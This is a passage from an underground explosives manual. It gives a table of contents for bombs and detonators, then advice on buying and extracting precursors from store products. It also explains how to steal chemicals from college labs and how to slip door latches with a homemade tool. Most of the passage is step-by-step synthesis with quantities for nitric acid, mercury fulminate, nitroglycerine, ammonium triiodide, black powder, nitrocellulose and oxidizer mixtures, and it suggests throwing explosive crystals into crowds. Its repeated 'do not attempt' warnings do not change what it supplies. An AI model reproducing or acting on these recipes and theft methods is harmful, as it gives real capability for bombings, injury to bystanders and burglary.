3.5 ....... OTHER "EXPLOSIVES"
3.51 ........ Thermit
3.52 ........ Molotov Cocktails
3.53 ........ Chemical Fire Bottle
3.54 ........ Bottled Gas Explosives
4.0 ....... USING EXPLOSIVES
4.1 ....... SAFETY
4.2 ....... IGNITION DEVICES
4.21 ........ Fuse Ignition
4.22 ........ Impact Ignition
4.23 ........ Electrical Ignition
4.24 ........ Electro - Mechanical Ignition
4.241 ....... Mercury Switches
4.242 ....... Tripwire Switches
4.243 ....... Radio Control Detonators
4.3 ....... DELAYS
4.31 ........ Fuse Delays
4.32 ........ Timer Delays
4.33 ........ Chemical Delays
4.4 ....... EXPLOSIVE CONTAINERS
4.41 ........ Paper Containers
4.42 ........ Metal Containers
4.43 ........ Glass Containers
4.44 ........ Plastic Containers
4.5 ....... ADVANCED USES FOR EXPLOSIVES
4.51 ........ Shaped Charges
4.52 ........ Tube Explosives
4.53 ........ Atomized Particle Explosions
4.54 ........ Lightbulb Bombs
4.55 ........ Book Bombs
4.56 ........ Phone Bombs
5.0 ....... SPECIAL AMMUNITION FOR PROJECTILE WEAPONS
5.1 ..
..... PROJECTILE WEAPONS (PRIMITIVE)
5.11 ........ Bow and Crossbow Ammunition
5.12 ........ Blowgun Ammunition
5.13 ........ Wrist Rocket and Slingshot Ammunition
5.2 ....... PROJECTILE WEAPONS (FIREARMS)
5.21 ........ Handgun Ammunition
5.22 ........ Shotguns
5.3 ....... PROJECTILE WEAPONS (COMPRESSED GAS)
5.31 ........ .177 Caliber B.B Gun Ammunition
5.32 ........ .22 Caliber Pellet Gun Ammunition
6.0 ....... ROCKETS AND CANNONS
6.1 ....... ROCKETS
6.11 ........ Basic Rocket-Bomb
6.12 ........ Long Range Rocket-Bomb
6.13 ........ Multiple Warhead Rocket-Bombs
6.2 ........ CANNONS
6.21 ........ Basic Pipe Cannon
6.22 ........ Rocket-Firing Cannon
7.0 ....... PYROTECHNICA ERRATA
7.1 ......... Smoke Bombs
7.2 ......... Colored Flames
7.3 ......... Tear Gas
7.4 ......... Fireworks
7.41 ........ Firecrackers
7.42 ........ Skyrockets
7.43 ........ Roman Candles
8.0 ....... LISTS OF SUPPLIERS AND FURTHER INFORMATION
9.0 ....... CHECKLIST FOR RAIDS ON LABS
10.0 ...... USEFUL PYROCHEMIST
RY
11.0 ...... ABOUT THE AUTHOR


2.0 BUYING EXPLOSIVES AND PROPELLANTS
Almost any city or town of reasonable size has a gun store and
a pharmacy. These are two of the places that potential terrorists visit in
order to purchase explosive material. All that one has to do is know something
about the non-explosive uses of the materials. Black powder, for example,
is used in blackpowder firearms. It comes in varying "grades", with each
different grade being a slightly different size. The grade of black powder
depends on what the calibre of the gun that it is used in; a fine grade of
powder could burn too fast in the wrong caliber weapon. The rule is:
the smaller the grade, the faster the burn rate of the powder.

2.01 BLACK POWDER

Black powder is generally available in three grades. As stated before,
the smaller the grade, the faster the powder burns. Burn rate is extremely
important in bombs. Since an explosion is a rapid increase of gas volume in
a confined envir
onment, to make an explosion, a quick-burning powder is
desirable. The three common grades of black powder are listed below, along
with the usual bore width (calibre) of what they are used in. Generally,
the fastest burning powder, the FFF grade is desirable. However, the other
grades and uses are listed below:

GRADE BORE WIDTH EXAMPLE OF GUN
ÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
F .50 or greater model cannon; some rifles
FF .36 - .50 large pistols; small rifles
FFF .36 or smaller pistols; derringers

The FFF grade is the fastest burning, because the smaller grade has
more surface area or burning surface exposed to the flame front. The larger
grades also have uses which will be discussed later. The price range of
black powder, per pound, is about $8.50 - $9.00. The price is not affected
by the grade, and so one saves oneself time and work if
one buys the finer
grade of powder. The major problems with black powder are that it can be
ignited accidentally by static electricity, and that it has a tendency to
absorb moisture from the air. To safely crush it, a bomber would use a plastic
spoon and a wooden salad bowl. Taking a small pile at a time, he or she would
apply pressure to the powder through the spoon and rub it in a series of strokes
or circles, but not too hard. It is fine enough to use when it is about as fine
as flour. The fineness, however, is dependant on what type of device one wishes
to make; obviously, it would be impracticle to crush enough powder to fill a 1
foot by 4 inch radius pipe. Anyone can purchase black powder, since anyone can
own black powder firearms in America.

















2.02 PYRODEX

Pyrodex is a synthetic powder that is used like black powder. It comes
in the same grades, but it is more expensive per pound. However, a one pound
container of pyrodex contains more material by volume than a pound
of black
powder. It is much easier to crush to a very fine powder than black powder, and
it is considerably safer and more reliable. This is because it will
not be set off by static electricity, as black can be, and it is less inclined
to absorb moisture. It costs about $10.00 per pound. It can be crushed in the
same manner as black powder, or it can be dissolved in boiling water and dried.

2.03 ROCKET ENGINE POWDER
One of the most exciting hobbies nowadays is model rocketry. Estes is
the largest producer of model rocket kits and engines. Rocket engines are
composed of a single large grain of propellant. This grain is surrounded by
a fairly heavy cardboard tubing. One gets the propellant by slitting the tube
lengthwise, and unwrapping it like a paper towel roll. When this is done, the
grey fire clay at either end of the propellant grain must be removed. This is
usually done gently with a plastic or brass knife. The material is exceptionally
hard, and must be crushed to be used. By gr
ipping the grain on the widest
setting on a set of pliers, and putting the grain and powder in a plastic bag,
the powder will not break apart and shatter all over. This should be done to
all the large chunks of powder, and then it should be crushed like black powder.
Rocket engines come in various sizes, ranging from 1/4 A - 2T to the incredibly
powerful D engines. The larger the engine, the more expensive. D engines come
in packages of three, and cost about $5.00 per package. Rocket engines are
perhaps the single most useful item sold in stores to a terrorist, since they
can be used as is, or can be cannibalized for their explosive powder.

2.04 RIFLE/SHOTGUN POWDER
Rifle powder and shotgun powder are really the same from a practicle
standpoint. They are both nitrocellulose based propellants. They will be
referred to as gunpowder in all future references. Gunpowder is made by the
action of concentrated nitric and sulfuric acid upon cotton. This material is
then dissolved by solvents and then
reformed in the desired grain size. When
dealing with gunpowder, the grain size is not nearly as important as that of
black powder. Both large and small grained gunpowder burn fairly slowly
compared to black powder when unconfined, but when it is confined, gunpowder
burns both hotter and with more gaseous expansion, producing more pressure.
Therefore, the grinding process that is often necessary for other propellants
is not necessary for gunpowder. Gunpowder costs about $9.00 per pound. Any
idiot can buy it, since there are no restrictions on rifles or shotguns in the
U.S.

2.05 FLASH POWDER

Flash powder is a mixture of powdered zirconium metal and various
oxidizers. It is extremely sensitive to heat or sparks, and should be treated
with more care than black powder, with which it should NEVER be mixed. It is
sold in small containers which must be mixed and shaken before use. It is very
finely powdered, and is available in three speeds: fast, medium, and slow. The
fast flash powder is the bes
t for using in explosives or detonators.




It burns very rapidly, regardless of confinement or packing, with a hot
white "flash", hence its name. It is fairly expensive, costing about $11.00.
It is sold in magic shops and theatre supply stores.

2.06 AMMONIUM NITRATE

Ammonium nitrate is a high explosive material that is often used as
a commercial "safety explosive" It is very stable, and is difficult to ignite
with a match. It will only light if the glowing, red-hot part of a match is
touching it. It is also difficult to detonate; (the phenomenon of detonation
will be explained later) it requires a large shockwave to cause it to go high
explosive. Commercially, it is sometimes mixed with a small amount of
nitroglycerine to increase its sensitivity. Ammonium nitrate is used in the
"Cold-Paks" or "Instant Cold", available in most drug stores. The "Cold Paks"
consist of a bag of water, surrounded by a second plastic bag containing the
ammonium nitrate. To get the ammonium nitrate, simply
cut off the top of the
outside bag, remove the plastic bag of water, and save the ammonium nitrate in
a well sealed, airtight container, since it is rather hydroscopic, i.e. it
tends to absorb water from the air. It is also the main ingredient in many
fertilizers.

2.1 ACQUIRING CHEMICALS

The first section deals with getting chemicals legally. This section
deals with "procuring" them. The best place to steal chemicals is a college.
Many state schools have all of their chemicals out on the shelves in the
labs, and more in their chemical stockrooms. Evening is the best time to enter
lab buildings, as there are the least number of people in the buildings, and
most of the labs will still be unlocked. One simply takes a bookbag, wears
a dress shirt and jeans, and tries to resemble a college freshman. If anyone
asks what such a person is doing, the thief can simply say that he is looking
for the polymer chemistry lab, or some other chemistry-related department
other than the one they are in. One can us
ually find out where the various
labs and departments in a building are by calling the university. There
are, of course other techniques for getting into labs after hours, such as
placing a piece of cardboard in the latch of an unused door, such as a back
exit. Then, all one needs to do is come back at a later hour. Also, before
this is done, terrorists check for security systems. If one just walks into a
lab, even if there is someone there, and walks out the back exit, and slip the
cardboard in the latch before the door closes, the person in the lab will never
know what happened. It is also a good idea to observe the building that one
plans to rob at the time that one plans to rob it several days before the
actual theft is done. This is advisable since the would-be thief should know
when and if the campus security makes patrols through buildings. Of course, if
none of these methods are successful, there is always section 2.11, but as a
rule, college campus security is pretty poor, and nobody suspects anothe
r
person in the building of doing anything wrong, even if they are there at an
odd hour.

2.11 TECHNIQUES FOR PICKING LOCKS

If it becomes necessary to pick a lock to enter a lab, the world's
most effective lockpick is dynamite, followed by a sledgehammer. There are
unfortunately, problems with noise and excess structural damage with these
methods. The next best thing, however, is a set of army issue lockpicks.




These, unfortunately, are difficult to acquire. If the door to a lab is locked,
but the deadbolt is not engaged, then there are other possibilities. The rule
here is: if one can see the latch, one can open the door. There are several
devices which facilitate freeing the latch from its hole in the wall. Dental
tools, stiff wire ( 20 gauge ), specially bent aluminum from cans, thin pocket-
knives, and credit cards are the tools of the trade. The way that all these
tools and devices are uses is similar: pull, push, or otherwise move the latch
out of its hole in the wall, and pull the doo
r open. This is done by sliding
whatever tool that you are using behind the latch, and pulling the latch out
from the wall. To make an aluminum-can lockpick, terrorists can use an aluminum
can and carefully cut off the can top and bottom. Cut off the cans' ragged
ends. Then, cut the open-ended cylinder so that it can be flattened out into a
single long rectangle. This should then be cut into inch wide strips. Fold the
strips in 1/4 inch increments (1). One will have a long quadruple-thick 1/4
inch wide strip of aluminum. This should be folded into an L-shape, a J-shape,
or a U-shape. This is done by folding. The pieces would look like this:

(1)
_________________________________________________________ v
1/4 |_______________________________________________________| |
1/4 |_______________________________________________________| | 1 inch
1/4 |_______________________________________________________| |
1/4 |_______________________________________________________| |
^
Fold along lines to make a single quadruple-thick piece of
aluminum. This should then be folded to produce an L,J,or U shaped
device that looks like this:
__________________________________________
/ ________________________________________|
| |
| | L-shaped
| |
| |
|_|
_____________________________
/ ___________________________|
| |
| | J-shaped
| |
| |________
\________|
_____________________
/ ___________________|
| |
| |
| | U-shaped
| |
| |____________________
\____________________|

All of these devices should be used to hook the latch of a door and
pull the latch out of its hole. The folds in the lockpicks will be between
the door and the wall, and so the device will not unfold, if it is made
properly.





2.2 LIST OF USEFUL HOUSEHOLD CHEMICALS AND THEIR AVAILABILITY
Anyone can get many chemicals from hardware stores, supermarkets,
and drug stores to get the materials to make explosives or other dangerous
compounds. A would-be terrorist would merely need a station wagon and some
money to acquire many of the chemicals named here.

Chemical Used In Available at
________ _______ ____________
_____________________________________________________________________________
alcohol, ethyl * alcoholic beverages liquor stores
solvents (95% min. for both) hardware stores
______________________________________________________
_______________________
ammonia + CLEAR household ammonia supermarkets/7-eleven
_____________________________________________________________________________
ammonium instant-cold paks, drug stores,
nitrate fertilizers medical supply stores
_____________________________________________________________________________
nitrous oxide pressurizing whip cream party supply stores
_____________________________________________________________________________
magnesium firestarters surplus/camping stores
____________________________________________________________________________
lecithin vitamins pharmacies/drug stores
_____________________________________________________________________________
mineral oil cooking, laxative supermarket/drug stores
_____________________________________________________________________________
mercury
@ mercury thermometers supermarkets/hardware stores
_____________________________________________________________________________
sulfuric acid uncharged car batteries automotive stores
_____________________________________________________________________________
glycerine ? pharmacies/drug stores
_____________________________________________________________________________
sulfur gardening gardening/hardware store
_____________________________________________________________________________
charcoal charcoal grills supermarkets/gardening stores
_____________________________________________________________________________
sodium nitrate fertilizer gardening store
_____________________________________________________________________________
cellulose (cotton) first aid drug/medical supply stores
_________________________________
____________________________________________
strontium nitrate road flares surplus/auto stores,
_____________________________________________________________________________
fuel oil kerosene stoves surplus/camping stores,
_____________________________________________________________________________
bottled gas propane stoves surplus/camping stores,
_____________________________________________________________________________
potassium permanganate water purification purification plants
_____________________________________________________________________________
hexamine or hexamine stoves surplus/camping stores
methenamine (camping)
_____________________________________________________________________________
nitric acid ^ cleaning printing printing shops
plates photography stores
________________________________
_____________________________________________
iodine & first aid drug stores
_____________________________________________________________________________
sodium perchlorate solidox pellets hardware stores
for cutting torches
_____________________________________________________________________________




notes: * ethyl alcohol is mixed with methyl alcohol when it is used as a
solvent. Methyl alcohol is very poisonous. Solvent alcohol must be
at least 95% ethyl alcohol if it is used to make mercury fulminate.
Methyl alcohol may prevent mercury fulminate from forming.

+ Ammonia, when bought in stores comes in a variety of forms. The
pine and cloudy ammonias should not be bought; only the clear
ammonia should be used to make ammonium triiodide crystals.

@ Mercury thermometers are becoming a rarity, unfortunately. They
may be hard to find in most stores. Mercury is also used in
mercury
switches, which are available at electronics stores. Mercury is a
hazardous substance, and should be kept in the thermometer or
mercury switch until used. It gives off mercury vapors which will
cause brain damage if inhaled. For this reason, it is a good idea
not to spill mercury, and to always use it outdoors. Also, do not
get it in an open cut; rubber gloves will help prevent this.

^ Nitric acid is very difficult to find nowadays. It is usually
stolen by bomb makers, or made by the process described in a later
section. A desired concentration for making explosives about 70%.

& The iodine sold in drug stores is usually not the pure crystaline
form that is desired for producing ammonium triiodide crystals.
To obtain the pure form, it must usually be acquired by a doctor's
prescription, but this can be expensive. Once again, theft is the
means that terrorists result to.

2.3 PREPARATION OF CHEMI
CALS
2.31 NITRIC ACID

There are several ways to make this most essential of all acids for
explosives. One method by which it could be made will be presented. Once
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!
Materials: Equipment:
ÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄ
sodium nitrate or adjustable heat source
potassium nitrate
retort
distilled water
ice bath
concentrated
sulfuric acid stirring rod
collecting flask with stopper

1) Pour 32 milliliters of concentrated sulfuric acid into the retort.
2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of potassium
nitrate. and add this to the acid slowly. If it all does not dissolve,
carefully stir the solution with a glass rod until it does.





3) Place the op
en end of the retort into the collecting flask, and place the
collecting flask in the ice bath.
4) Begin heating the retort, using low heat. Continue heating until liquid
begins to come out of the end of the retort. The liquid that forms is nitric
acid. Heat until the precipitate in the bottom of the retort is almost dry,
or until no more nitric acid is forming. CAUTION: If the acid is headed too
strongly, the nitric acid will decompose as soon as it is formed. This
can result in the production of highly flammable and toxic gasses that may
explode. It is a good idea to set the above apparatus up, and then get
away from it.

Potassium nitrate could also be obtained from store-bought black powder,
simply by dissolving black powder in boiling water and filtering out
the sulfur and charcoal. To obtain 68 g of potassium nitrate, it would be
necessary to dissolve about 90 g of black powder in about one litre of
boiling water. Filter the dissolved solution through filter paper in
a funnel
into a jar until the liquid that pours through is clear. The charcoal and
sulfur in black powder are insoluble in water, and so when the solution of
water is allowed to evaporate, potassium nitrate will be left in the jar.

2.32 SULFURIC ACID
Sulfuric acid is far too difficult to make outside of a laboratory or
industrial plant. However, it is readily available in an uncharged car battery.
A person wishing to make sulfuric acid would simply remove the top of a car
battery and pour the acid into a glass container. There would probably be
pieces of lead from the battery in the acid which would have to be removed,
either by boiling or filtration. The concentration of the sulfuric acid can
also be increased by boiling it; very pure sulfuric acid pours slightly faster
than clean motor oil.

2.33 AMMONIUM NITRATE
Ammonium nitrate is a very powerful but insensitive high-order
explosive. It could be made very easily by pouring nitric acid into a large
flask in an ice bath. Then, by
simply pouring household ammonia into the flask
and running away, ammonium nitrate would be formed. After the materials have
stopped reacting, one would simply have to leave the solution in a warm place
until all of the water and any unneutralized ammonia or acid have evaporated.
There would be a fine powder formed, which would be ammonium nitrate. It must
be kept in an airtight container, because of its tendency to pick up water from
the air. The crystals formed in the above process would have to be heated VERY
gently to drive off the remaining water.

3.0 EXPLOSIVE RECIPES
Once again, persons reading this material MUST NEVER ATTEMPT TO PRODUCE
ANY OF THE EXPLOSIVES DESCRIBED HEREIN. IT IS ILLEGAL AND EXTREMELY DANGEROUS
TO ATTEMPT TO DO SO. LOSS OF LIFE AND/OR LIMB COULD EASILY OCCUR AS A RESULT
OF ATTEMPTING TO PRODUCE EXPLOSIVE MATERIALS.
These recipes are theoretically correct, meaning that an individual
could conceivably produce the materials described. The methods here are usually
scaled-down industrial procedures.






3.01 EXPLOSIVE THEORY
An explosive is any material that, when ignited by heat or shock,
undergoes rapid decomposition or oxidation. This process releases energy that
is stored in the material in the form of heat and light, or by breaking down
into gaseous compounds that occupy a much larger volume that the original piece
of material. Because this expansion is very rapid, large volumes of air are
displaced by the expanding gasses. This expansion occurs at a speed greater
than the speed of sound, and so a sonic boom occurs. This explains the
mechanics behind an explosion. Explosives occur in several forms: high-order
explosives which detonate, low order explosives, which burn, and primers, which
may do both.
High order explosives detonate. A detonation occurs only in a high
order explosive. Detonations are usually incurred by a shockwave that passes
through a block of the high explosive material. The shockwave breaks apart
the molecular bonds bet
ween the atoms of the substance, at a rate approximately
equal to the speed of sound traveling through that material. In a high
explosive, the fuel and oxodizer are chemically bonded, and the shockwave breaks
apart these bonds, and re-combines the two materials to produce mostly gasses.
T.N.T., ammonium nitrate, and R.D.X. are examples of high order explosives.
Low order explosives do not detonate; they burn, or undergo oxidation.
when heated, the fuel(s) and oxodizer(s) combine to produce heat, light, and
gaseous products. Some low order materials burn at about the same speed under
pressure as they do in the open, such as blackpowder. Others, such as gunpowder,
which is correctly called nitrocellulose, burn much faster and hotter when they
are in a confined space, such as the barrel of a firearm; they usually burn
much slower than blackpowder when they are ignited in unpressurized conditions.
Black powder, nitrocellulose, and flash powder are good examples of low order
explosives.
Primers are p
eculiarities to the explosive field. Some of them, such as
mercury filminate, will function as a low or high order explosive. They are
usually more sensitive to friction, heat, or shock, than the high or low
explosives. Most primers perform like a high order explosive, except that they
are much more sensitive. Still others merely burn, but when they are confined,
they burn at a great rate and with a large expansion of gasses and a shockwave.
Primers are usually used in a small amount to initiate, or cause to decompose,
a high order explosive, as in an artillery shell. But, they are also frequently
used to ignite a low order explosive; the gunpowder in a bullet is ignited by
the detonation of its primer.

3.1 IMPACT EXPLOSIVES
Impact explosives are often used as primers. Of the ones discussed
here, only mercury fulminate and nitroglycerine are real explosives; Ammonium
triiodide crystals decompose upon impact, but they release little heat and no
light. Impact explosives are always treated wi
th the greatest care, and even
the stupidest anarchist never stores them near any high or low explosives.

3.11 AMMONIUM TRIIODIDE CRYSTALS
Ammonium triiodide crystals are foul-smelling purple colored crystals
that decompose under the slightest amount of heat, friction, or shock, if they
are made with the purest ammonia (ammonium hydroxide) and iodine. Such
crystals are said to detonate when a fly lands on them, or when an ant walks
across them. Household ammonia, however, has enough impurities, such as soaps
and abrasive agents, so that the crystals will detonate when thrown,crushed, or




heated. Upon detonation, a loud report is heard, and a cloud of purple iodine
gas appears about the detonation site. Whatever the unfortunate surface that
the crystal was detonated upon will usually be ruined, as some of the iodine
in the crystal is thrown about in a solid form, and iodine is corrosive. It
leaves nasty, ugly, permanent brownish-purple stains on whatever it contacts.
Iodine gas is also bad
news, since it can damage lungs, and it settles to the
ground and stains things there also. Touching iodine leaves brown stains on
the skin that last for about a week, unless they are immediately and vigorously
washed off. While such a compound would have little use to a serious terrorist,
a vandal could utilize them in damaging property. Or, a terrorist could throw
several of them into a crowd as a distraction, an action which would possibly
injure a few people, but frighten almost anyone, since a small crystal that
not be seen when thrown produces a rather loud explosion. Ammonium triiodide
crystals could be produced in the following manner:
Materials Equipment
ÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄ
iodine crystals funnel and filter paper
paper towels
clear ammonia
(ammonium hydroxide, two throw-away glass jars
for the suicidal)

1) Place about two teaspoons of iodine into one of the glass jars. The jars
must bo
th be throw away because they will never be clean again.
2) Add enough ammonia to completely cover the iodine.
3) Place the funnel into the other jar, and put the filter paper in the funnel.
The technique for putting filter paper in a funnel is taught in every basic
chemistry lab class: fold the circular paper in half, so that a semi-circle
is formed. Then, fold it in half again to form a triangle with one curved
side. Pull one thickness of paper out to form a cone, and place the cone
into the funnel.
4) After allowing the iodine to soak in the ammonia for a while, pour the
solution into the paper in the funnel through the filter paper.
5) While the solution is being filtered, put more ammonia into the first jar
to wash any remaining crystals into the funnel as soon as it drains.
6) Collect all the purplish crystals without touching the brown filter paper,
and place them on the paper towels to dry for about an hour. Make sure that
they are not too close to any lights or othe
r sources of heat, as they could
well detonate. While they are still wet, divide the wet material into about
eight chunks.
7) After they dry, gently place the crystals onto a one square inch piece of
duct tape. Cover it with a similar piece, and gently press the duct tape
together around the crystal, making sure not to press the crystal itself.
Finally, cut away most of the excess duct tape with a pair of scissors, and
store the crystals in a cool dry safe place. They have a shelf life of
about a week, and they should be stored in individual containers that can be
thrown away, since they have a tendency to slowly decompose, a process which
gives off iodine vapors, which will stain whatever they settle on. One
possible way to increase their shelf life is to store them in airtight
containers. To use them, simply throw them against any surface or place them
where they will be stepped on or crushed.





3.12 MERCURY FULMINATE

Mercury fulminate is perhaps one
of the oldest known initiating
compounds. It can be detonated by either heat or shock, which would make it
of infinite value to a terrorist. Even the action of dropping a crystal of
the fulminate causes it to explode. A person making this material would
probably use the following procedure:


MATERIALS EQUIPMENT
ÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄ
mercury (5 g) glass stirring rod
concentrated nitric 100 ml beaker (2)
acid (35 ml)
adjustable heat
ethyl alcohol (30 ml) source
distilled water blue litmus paper
funnel and filter paper


1) In one beaker, mix 5 g of mercury with 35 ml of concentrated nitric acid,
using the glass rod.
2) Slowly heat the mixture until the mercury is dissolved, which is when the
solution turns green and boils.
3) Place 30 ml of ethyl alcohol into the second beaker, and slowly and carefully
add all of the contents
of the first beaker to it. Red and/or brown fumes
should appear. These fumes are toxic and flammable.
4) After thirty to forty minutes, the fumes should turn white, indicating that
the reaction is near completion. After ten more minutes, add 30 ml of the
distilled water to the solution.
5) Carefully filter out the crystals of mercury fulminate from the liquid
solution. Dispose of the solution in a safe place, as it is corrosive
and toxic.
6) Wash the crystals several times in distilled water to remove as much excess
acid as possible. Test the crystals with the litmus paper until they are
neutral. This will be when the litmus paper stays blue when it touches the
wet crystals
7) Allow the crystals to dry, and store them in a safe place, far away from
any explosive or flammable material.

This procedure can also be done by volume, if the available mercury
cannot be weighed. Simply use 10 volumes of nitric acid and 10 volumes of
ethanol to every one volume of mer
cury.







3.13 NITROGLYCERINE
Nitroglycerine is one of the most sensitive explosives, if it is not
the most sensitive. Although it is possible to make it safely, it is difficult.
Many a young anarchist has been killed or seriously injured while trying to
make the stuff. When Nobel's factories make it, many people were killed by the
all-to-frequent factory explosions. Usually, as soon as it is made, it is
converted into a safer substance, such as dynamite. An idiot who attempts
to make nitroglycerine would use the following procedure:

MATERIAL EQUIPMENT
ÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄ
distilled water eye-dropper
table salt 100 ml beaker
sodium bicarbonate 200-300 ml beakers (2)
concentrated nitric ice bath container
acid (13 ml) ( a plastic bucket serves well )
concentrated sulfuric centigrade thermometer
acid (39 ml)
blue litmus paper
glycerine

1) Plac
e 150 ml of distilled water into one of the 200-300 ml beakers.
2) In the other 200-300 ml beaker, place 150 ml of distilled water and about
a spoonful of sodium bicarbonate, and stir them until the sodium bicarbonate
dissolves. Do not put so much sodium bicarbonate in the water so that some
remains undissolved.
3) Create an ice bath by half filling the ice bath container with ice, and
adding table salt. This will cause the ice to melt, lowering the overall
temperature.
4) Place the 100 ml beaker into the ice bath, and pour the 13 ml of concentrated
nitric acid into the 100 ml beaker. Be sure that the beaker will not spill
into the ice bath, and that the ice bath will not overflow into the beaker
when more materials are added to it. Be sure to have a large enough ice bath
container to add more ice. Bring the temperature of the acid down to about 20
degrees centigrade or less.
5) When the nitric acid is as cold as stated above, slowly and carefully add the
39 ml of con
centrated sulfuric acid to the nitric acid. Mix the two acids
together, and cool the mixed acids to 10 degrees centigrade. It is a good
idea to start another ice bath to do this.
6) With the eyedropper, slowly put the glycerine into the mixed acids, one drop
at a time. Hold the thermometer along the top of the mixture where the mixed
acids and glycerine meet. DO NOT ALLOW THE TEMPERATURE TO GET ABOVE 30
DEGREES CENTIGRADE; IF THE TEMPERATURE RISES ABOVE THIS TEMPERATURE, RUN
LIKE HELL!!! The glycerine will start to nitrate immediately, and the
temperature will immediately begin to rise. Add glycerine until there is a
thin layer of glycerine on top of the mixed acids. It is always safest to
make any explosive in small quantities.





7) Stir the mixed acids and glycerine for the first ten minutes of nitration,
adding ice and salt to the ice bath to keep the temperature of the solution
in the 100 ml beaker well below 30 degrees centigrade. Usually, the
nitroglyceri
ne will form on the top of the mixed acid solution, and the
concentrated sulfuric acid will absorb the water produced by the reaction.
8) When the reaction is over, and when the nitroglycerine is well below 30
degrees centigrade, slowly and carefully pour the solution of nitroglycerine
and mixed acid into the distilled water in the beaker in step 1. The
nitroglycerine should settle to the bottom of the beaker, and the water-acid
solution on top can be poured off and disposed of. Drain as much of the
acid-water solution as possible without disturbing the nitroglycerine.
9) Carefully remove the nitroglycerine with a clean eye-dropper, and place it
into the beaker in step 2. The sodium bicarbonate solution will eliminate
much of the acid, which will make the nitroglycerine more stable, and less
likely to explode for no reason, which it can do. Test the nitroglycerine
with the litmus paper until the litmus stays blue. Repeat this step if
necessary, and use new sodium bicarbo
nate solutions as in step 2.
10) When the nitroglycerine is as acid-free as possible, store it in a clean
container in a safe place. The best place to store nitroglycerine is
far away from anything living, or from anything of any value.
Nitroglycerine can explode for no apparent reason, even if it is stored
in a secure cool place.

3.14 PICRATES
Although the procedure for the production of picric acid, or
trinitrophenol has not yet been given, its salts are described first, since they
are extremely sensitive, and detonate on impact. By mixing picric acid with
metal hydroxides, such as sodium or potassium hydroxide, and evaporating the
water, metal picrates can be formed. Simply obtain picric acid, or produce it,
and mix it with a solution of (preferably) potassium hydroxide, of a mid range
molarity. (about 6-9 M) This material, potassium picrate, is impact-sensitive,
and can be used as an initiator for any type of high explosive.
3.2 LOW-ORDER EXPLOSIVES
There are
many low-order explosives that can be purchased in gun
stores and used in explosive devices. However, it is possible that a wise
wise store owner would not sell these substances to a suspicious-looking
individual. Such an individual would then be forced to resort to making
his own low-order explosives.

3.21 BLACK POWDER

First made by the Chinese for use in fireworks, black powder was first
used in weapons and explosives in the 12th century. It is very simple to make,
but it is not very powerful or safe. Only about 50% of black powder is
converted to hot gasses when it is burned; the other half is mostly very fine
burned particles. Black powder has one major problem: it can be ignited by
static electricity. This is very bad, and it means that the material must be
made with wooden or clay tools. Anyway, a misguided individual could
manufacture black powder at home with the following procedure:







MATERIALS EQUIPMENT
ÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄ
potassium
clay grinding bowl
nitrate (75 g) and clay grinder
or or
sodium wooden salad bowl
nitrate (75 g) and wooden spoon
sulfur (10 g) plastic bags (3)
charcoal (15 g) 300-500 ml beaker (1)
distilled water coffee pot or heat source

1) Place a small amount of the potassium or sodium nitrate in the grinding bowl
and grind it to a very fine powder. Do this to all of the potassium or
sodium nitrate, and store the ground powder in one of the plastic bags.
2) Do the same thing to the sulfur and charcoal, storing each chemical in a
separate plastic bag.
3) Place all of the finely ground potassium or sodium nitrate in the beaker, and
add just enough boiling water to the chemical to get it all wet.
4) Add the contents of the other plastic bags to the wet potassium or sodium
nitrate, and mix them well for several minutes. Do this until there is no
more visible s
ulfur or charcoal, or until the mixture is universally black.
5) On a warm sunny day, put the beaker outside in the direct sunlight. Sunlight
is really the best way to dry black powder, since it is never too hot, but it
is hot enough to evaporate the water.
6) Scrape the black powder out of the beaker, and store it in a safe container.
Plastic is really the safest container, followed by paper. Never store black
powder in a plastic bag, since plastic bags are prone to generate static
electricity.

3.22 NITROCELLULOSE
Nitrocellulose is usually called "gunpowder" or "guncotton". It is more
stable than black powder, and it produces a much greater volume of hot gas. It
also burns much faster than black powder when it is in a confined space.
Finally, nitrocellulose is fairly easy to make, as outlined by the following
procedure:

MATERIALS EQUIPMENT
ÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄ
cotton (cellulose) two (2) 200-300 ml beakers
c
oncentrated funnel and filter paper
nitric acid
blue litmus paper
concentrated
sulfuric acid
distilled water




1) Pour 10 cc of concentrated sulfuric acid into the beaker. Add to this
10 cc of concentrated nitric acid.
2) Immediately add 0.5 gm of cotton, and allow it to soak for exactly 3
minutes.
3) Remove the nitrocotton, and transfer it to a beaker of distilled water
to wash it in.
4) Allow the material to dry, and then re-wash it.
5) After the cotton is neutral when tested with litmus paper, it is ready to
be dried and stored.

3.23 FUEL-OXODIZER MIXTURES
There are nearly an infinite number of fuel-oxodizer mixtures that can
be produced by a misguided individual in his own home. Some are very effective
and dangerous, while others are safer and less effective. A list of working
fuel-oxodizer mixtures will be presented, but the exact measurements of each
compound are debatable for maximum effectiveness.
A rough estimate will be
given of the percentages of each fuel and oxodizer:


oxodizer, % by weight fuel, % by weight speed # notes
================================================================================
potassium chlorate 67% sulfur 33% 5 friction/impact
sensitive; unstable
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium chlorate 50% sugar 35% 5 fairly slow burning;
charcoal 15% unstable
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium chlorate 50% sulfur 25% 8 extremely
magnesium or unstable!
aluminum dust 25%
